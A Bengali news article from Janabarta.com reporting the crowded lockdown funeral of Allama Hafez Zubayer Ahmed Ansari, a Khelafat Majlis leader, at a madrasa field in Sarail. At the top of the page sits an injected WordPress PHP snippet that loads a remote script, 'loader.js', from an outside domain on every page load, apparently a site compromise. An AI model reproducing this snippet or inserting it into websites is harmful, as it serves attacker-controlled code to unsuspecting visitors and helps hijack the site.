// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site লকডাউনের মধ্যেই যুবায়ের আহমেদ আনসারীর জানাজায় মানুষের ঢল - Janabarta.com

লকডাউনের মধ্যেই যুবায়ের আহমেদ আনসারীর জানাজায় মানুষের ঢল

জনবার্তা অনলাইনঃ বাংলাদেশ খেলাফত মজলিশের সিনিয়র নায়েবে আমীর, জামেয়া রাহমানিয়া বেড়তলা সরাইল মাদরাসার প্রতিষ্ঠাতা প্রিন্সিপাল ও শায়খুল হাদীস আল্লামা হাফেজ যুবায়ের আহমেদ আনসারীর জানাজা সম্পন্ন হয়েছে।

শনিবার সকাল ১০টায় বেড়তলা মাদরাসা মাঠে এ জানাজার নামাজ অনুষ্ঠিত হয়। জানাজায় ছিল মানুষের ঢল। মাঠে জায়গা না পেয়ে মাঠসংলগ্ন ঢাকা-সিলেট মহাসড়কের প্রায় এক কিলোমিটার পর্যস্ত মহাসড়কে মুসল্লিদের কাতারবন্দী হয়ে জানাজার নামাজে অংশ নিতে দেখা গেছে। জানাজায় ইমামতি করেন মরহুমের দ্বিতীয় পুত্র হাফেজ মাওলানা আসাদ উল্লাহ।

সারাদেশে চলমান করোনা পরিস্থিতির ভয়কে উপেক্ষা করে স্বতঃস্ফূর্তভাবে হাজার হাজার আলেম-ওলামা ও ধর্মপ্রাণ মুসলমানের অংশগ্রহণে জানাজা শেষে নিজের প্রতিষ্ঠিত জামেয়া রাহমানিয়া বেড়তলা সরাইল মাদরাসা প্রাঙ্গণে চিরনিদ্রায় শায়িত হয়েছেন আল্লামা হাফেজ যুবায়ের আহমেদ আনসারী।

উল্লেখ্য, দীর্ঘদিন রোগে আক্রান্ত হয়ে চিকিৎসাধীন অবস্থায় শুক্রবার (১৭ এপ্রিল) বাদ আসর ব্রাহ্মণবাড়িয়া জেলা সদরের মার্কাজ পাড়ার নিজ বাসভবনে তিনি ইন্তেকাল করেন।

ব্রাহ্মণবাড়িয়া জেলার নাসিরনগর উপজেলার আলেয়ারা নামক এলাকায় জন্মগ্রহণকারী বর্ষীয়ান এ আলেমে দ্বীনের স্ত্রী, তিন পুত্র ও চার মেয়েসহ হাজার হাজার ছাত্র, অসংখ্য আত্মীয়-স্বজন ও গুণগ্রাহী রয়েছে।